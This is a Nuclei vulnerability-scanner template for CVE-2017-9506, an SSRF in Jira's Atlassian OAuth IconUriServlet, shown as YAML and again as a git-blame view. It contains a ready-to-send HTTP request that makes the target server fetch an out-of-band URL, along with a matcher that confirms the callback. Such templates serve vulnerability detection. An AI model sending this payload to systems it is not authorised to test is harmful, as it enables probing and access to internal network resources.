nuclei-templates/cves/2017/CVE-2017-9506.yaml

id: CVE-2017-9506

info:
  name: Jira IconURIServlet SSRF
  author: pdteam
  severity: high
  description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).
  reference: |
    - http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html
    - https://ecosystem.atlassian.net/browse/OAUTH-344
    - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3
  tags: cve,cve2017,atlassian,jira,ssrf

requests:
  - raw:
      - |
        GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https://{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Connection: close
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
        Accept-Language: en-US,en;q=0.9

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
cve id updates 2021-01-02 05:02:50 +00:00			`id: CVE-2017-9506`
Added templates 2020-04-04 18:19:48 +00:00
			`info:`
			`name: Jira IconURIServlet SSRF`
misc tag updates 2021-04-06 06:46:11 +00:00			`author: pdteam`
Added templates 2020-04-04 18:19:48 +00:00			`severity: high`
add some descr 2020-08-25 21:51:04 +00:00			`description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).`
Descriptions and references 2021-04-18 13:00:27 +00:00			`reference: \|`
			`- http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html`
			`- https://ecosystem.atlassian.net/browse/OAUTH-344`
			`- https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3`
Added tags to cves :sunglasses: (#813) * Added tags to cves :sunglasses: 2021-02-05 19:44:41 +00:00			`tags: cve,cve2017,atlassian,jira,ssrf`
Added templates 2020-04-04 18:19:48 +00:00
			`requests:`
OOB Template updates (WIP) 2021-04-18 16:36:07 +00:00			`- raw:`
			`- \|`
			`GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https://{{interactsh-url}} HTTP/1.1`
			`Host: {{Hostname}}`
			`Origin: {{BaseURL}}`
			`Connection: close`
			`User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8`
			`Accept-Language: en-US,en;q=0.9`

Added templates 2020-04-04 18:19:48 +00:00			`matchers:`
			`- type: word`
OOB Template updates (WIP) 2021-04-18 16:36:07 +00:00			`part: interactsh_protocol # Confirms the HTTP Interaction`
Added templates 2020-04-04 18:19:48 +00:00			`words:`
OOB Template updates (WIP) 2021-04-18 16:36:07 +00:00			`- "http"`